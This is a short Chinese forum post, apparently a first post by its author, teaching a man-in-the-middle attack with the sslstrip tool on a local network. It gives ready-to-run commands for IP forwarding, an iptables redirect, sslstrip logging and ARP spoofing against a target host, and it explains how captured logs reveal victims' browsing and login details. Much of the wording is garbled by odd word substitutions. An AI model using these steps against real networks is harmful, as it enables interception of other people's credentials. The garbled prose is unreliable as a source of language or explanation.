利用SSLstrip进行中间人攻击
很多人都知在内网进行中间人攻击手段使得攻击者更有效地截获内网用户的暗码及窃密动态。在BackTrack情况下应用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS如许用了OpenSSL的就没体例了….. 直到刚在US举办的black hat 2009会上,一老黑宣布的名为sslstrip的software,变像的筹算了此问题.
此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的冤家还概略看他在Black hat上的精彩讲述. 因sslstrip是用python写成,不必安设也可运行.
用法分为如下几步:
1) 用命令 echo “1” > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.
2) 用命令 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 使iptables把全数http数据导入sslstrip.
3) 运行 sslstrip -a -w ssllog (写入文本)
4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)
接下去就火暴等待吧! 😉 要提下的是生成的log文件如ssllog实际上是html格局的.用konquer概略关上,如许连目标在看的网页面也和盘托出了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不合错误的地方还请大狭们都指正!
SSLstrip颠末监视Http传输终了工作,当用户试图进入加密的https会话时它充任代办署理。当用户认为安全的会话已经劈头事,SSLstrip也颠末https联接到安全做事器,全数用户到SSLstrip的联接是http,这就意味着涉猎器上“毁灭性的劝诫”揭示已经被禁止,涉猎器看起来正常工作,在此期间全数的注册动态都概略恣意被截获。它还概略在涉猎器地点栏中示意https的安全锁logo,使得用户更加相信本人拜访的安全性。